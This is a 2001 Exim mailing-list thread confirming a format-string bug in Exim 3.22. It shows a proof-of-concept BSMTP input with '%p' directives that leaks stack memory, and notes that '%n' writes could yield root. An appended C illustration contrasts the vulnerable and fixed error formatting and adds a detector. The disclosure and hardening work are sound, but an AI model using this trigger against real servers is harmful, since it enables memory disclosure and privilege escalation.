Re: [Exim] [Security-l] lil' exim format bug (fwd)

Author: Chris Knipe
Date:  
To: Tabor J. Wells
CC: Tamas TEVESZ, lez, exim-users
Subject: Re: [Exim] [Security-l] lil' exim format bug (fwd)
Confirmed on RedHat 7.0, Exim 3.22...

[root@alcazar /root]# exim -bS
mail from:lez@lez
rcpt to:hax0r@lez
data
From:@@%p%p%p%p%p%p%p%p%p%p

.
550 Syntax error in 'From' header: domain missing or malformed: failing
address is:
@@0x817da500x8178240(nil)(nil)(nil)(nil)0x817d83c0x817d810(nil)(nil)
Transaction started in line 0
Error detected in line 5
An error was detected while processing a file of BSMTP input.
The error message was:

550 Syntax error in 'From' header: domain missing or malformed: failing
address is:
@@0x817da500x8178240(nil)(nil)(nil)(nil)0x817d83c0x817d810(nil)(nil)

The SMTP transaction started in line 0.
The error was detected in line 5.
0 previous messages were successfully processed.
The rest of the batch was abandoned.


On Thu, 7 Jun 2001, Tabor J. Wells wrote:

> I'm unable to get my 3.22 systems on Solaris 2.6 x86 and 8 on Sparc to
> exhibit this behavior, with the options Megyer stated were necessary. I
> wonder if it's OS specific.
>
> Megyer,
>
> Perhaps you could provide a bit more detail. Which version of Exim? Which
> OS and version? Also you could have approached the author (Philip Hazel)
> or the exim-users list in general before going public.
>
> Thanks,
>
> Tabor
>
> On Wed, Jun 06, 2001 at 04:12:16PM +0200,
> Tamas TEVESZ <ice@???> is thought to have said:
>
> > Exploitation:
> > -------------
> >
> > Try this:
> > ===8<======8<=======8<======
> > lez:~$ /usr/sbin/exim -bS
> > mail from:lez@lez
> > rcpt to:hax0r@lez
> > data
> > From:@@%p%p%p%p%p%p%p%p%p%p
> >
> > .
> > ===8<======8<=======8<=======
> >
> > Somewhere in the answers you should see:
> > 550 Syntax error in 'From' header: domain missing or malformed: failing address is: @@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40
> >
> > If you change %p's to %s's, you get a segfault. With a carefully constructed thing, it's easy to overwrite the saved eip with %n's and get root out of this bug.
> >
> > No exploit yet, but after the many local format bug exploits it's not much work to write one for a skilled man.
> > --
> > Megyer Laszlo (Lez)
> > lez@???
> > __________________________________________________
> > Security-l maillist - Security-l@???
> > http://sunserv.kfki.hu/mailman/listinfo/security-l
> >
> > --
> > ## List details at http://www.exim.org/mailman/listinfo/exim-users Exim details at http://www.exim.org/ ##
>
>


--

Regards,
Chris Knipe

Vardus (PTY) Ltd.
Technical Administrator
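The posted BSMTP sessions show an untrusted header value (the "@@%p%p..." address) being expanded by printf machinery inside the 550 error text. The following is an added illustration of that class of bug and its fix, not Exim's code and not anything from this thread: a hypothetical error-reporting helper in the style of a daemon's logging routine, the vulnerable call pattern (message text built from the address, then passed as the format argument), the hardened form (constant format, address passed only through %s), and a small directive counter a defender can use to flag header values that carry conversions. The names report, format_error_unsafe, format_error_safe and count_format_directives, the ERR_PREFIX text and the sample address are all constructed for this example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample value in the shape posted to the list: an address whose
 * local part consists of format directives. */
static const char *SAMPLE_ADDR = "@@%p%p%p%p%p%p%p%p%p%p";

static const char *ERR_PREFIX =
    "550 Syntax error in 'From' header: domain missing or malformed: "
    "failing address is: ";

/* Hypothetical error-reporting helper in the style of a daemon's logging
 * routine: formats into 'out' and returns the length vsnprintf reports. */
static int report(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
    return n;
}

/* Vulnerable pattern (hypothetical, not Exim's code): the untrusted address is
 * spliced into the message text first, and that text is then handed to
 * report() as the FORMAT argument. Every '%p' inside the address is now
 * interpreted by the printf machinery, which is what the hex values in the
 * list posting show. Shown for contrast only; nothing below calls it. */
int format_error_unsafe(char *out, size_t outsz, const char *addr)
{
    char msg[512];
    snprintf(msg, sizeof msg, "%s%s", ERR_PREFIX, addr);
    return report(out, outsz, msg);      /* BUG: attacker-controlled format */
}

/* Hardened form: the format string is a constant and the untrusted address
 * travels only as a '%s' argument, so its '%' characters are copied literally. */
int format_error_safe(char *out, size_t outsz, const char *addr)
{
    return report(out, outsz, "%s%s", ERR_PREFIX, addr);
}

/* Returns 1 if the safe path preserved the sample address byte-for-byte. */
int safe_keeps_directives_literal(void)
{
    char out[512];
    int n = format_error_safe(out, sizeof out, SAMPLE_ADDR);
    return n > 0 && strstr(out, SAMPLE_ADDR) != NULL;
}

/* Count printf-style directives in untrusted text. Useful as a detection
 * signal (log or alert on header values that carry conversions) and as a
 * pre-sink sanity check. "%%" is an escaped percent and is not counted; flags,
 * width, precision and length modifiers are skipped before the conversion
 * character is examined. */
int count_format_directives(const char *s)
{
    int count = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {               /* literal percent */
            p++;
            continue;
        }
        const char *q = p + 1;
        while (*q && strchr("-+ #0123456789.*hljztL", *q))
            q++;
        if (*q && strchr("diouxXeEfFgGaAcspn", *q)) {
            count++;
            p = q;
        }
    }
    return count;
}

int main(void)
{
    char out[512];
    format_error_safe(out, sizeof out, SAMPLE_ADDR);
    printf("safe: %s\n", out);
    printf("directives in sample address: %d\n",
           count_format_directives(SAMPLE_ADDR));
    return 0;
}
```

The only difference between the two error formatters is which argument carries the attacker's bytes; compiling with -Wformat-security (or -Wformat=2) makes the unsafe shape visible when the format function carries a format attribute, and the directive counter gives a cheap log-side indicator for the "%p%p" and "%n" values the thread describes.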